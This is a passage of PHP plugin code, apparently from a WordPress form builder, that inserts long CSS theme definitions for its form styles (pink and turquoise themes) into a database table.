"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0D7A31;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #0D7A31;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #018D08;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00AC0A;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #018F08 ;\r\n	background: -moz-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #018D08 ), color-stop(39%, #018F08 ), color-stop(100%, #00BE0A ));\r\n	background: -webkit-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	background: -o-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	background: -ms-linear-gradient(left, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\nbackground: linear-gradient(to right, #018D08 0%, #018F08 39%, #00BE0A 100%);\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #CEE0D3;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 05 pink\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #B05785;\r\nborder: 1px solid #F6E2ED;\r\nmargin-bottom: 10px;\r\ncolor: #F6E2ED;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/03/nextbg_hover.png) url([SITE_ROOT]/images/05/03/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/03/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/03/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/03/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/03/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/03/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #F6E2ED;\r\n	padding: 15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 0px;\r\n	background: #B05785;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: " ";\r\n	position: relative;\r\n	width: 97.7%;\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #B05785;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #B05785;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #B05785;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #D7639F;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #E47DB3;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #D863A0 ;\r\n	background: -moz-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #D7639F ), color-stop(39%, #D863A0 ), color-stop(100%, #F173B4 ));\r\n	background: -webkit-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	background: -o-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	background: -ms-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\nbackground: linear-gradient(to right, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #D6CAD2;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 06 turquoise\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #B1EBE9;\r\nborder: 1px solid #018580;\r\nmargin-bottom: 10px;\r\ncolor: #018580;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: 